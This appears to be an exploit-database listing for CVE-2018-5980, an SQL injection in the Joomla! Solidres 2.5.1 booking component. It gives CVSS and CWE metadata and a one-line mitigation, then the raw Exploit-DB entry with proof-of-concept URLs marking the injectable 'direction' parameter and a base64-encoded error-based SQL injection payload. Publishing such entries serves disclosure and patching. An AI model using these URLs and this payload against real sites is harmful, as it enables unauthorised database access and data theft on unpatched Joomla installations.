header-logo
Suggest Exploit
vendor:
Solidres
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Solidres
Affected Version From: 2.5.1
Affected Version To: 2.5.1
Patch Exists: YES
Related CWE: CVE-2018-5980
CPE: a:solidres:solidres:2.5.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Solidres 2.5.1 – SQL Injection

Joomla! Component Solidres 2.5.1 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'location', 'checkin', 'checkout', 'room_quantity', 'room_opt[1][adults]', 'room_opt[1][children]', 'task', 'start', 'Itemid', '9f3d70a896d5f1332174599ecac43607', 'ordering', 'direction', and 'type_id' parameters in the 'index.php/en/component/solidres/' URL. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# # # # 
# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/
# Version: 2.5.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5980
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12
# 
# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]
# 
# LChTRUxFQ1QgNDU2MSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHg3MTYyNmE3MTcxLChTRUxFQ1QgKEVMVCg0NTYxPTQ1NjEsMSkpKSwweDcxNmI3MDYyNzEsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLlBMVUdJTlMgR1JPVVAgQlkgeClhKQ==
# 
# # # #

Navigation

Suggest Exploit

Services By CQR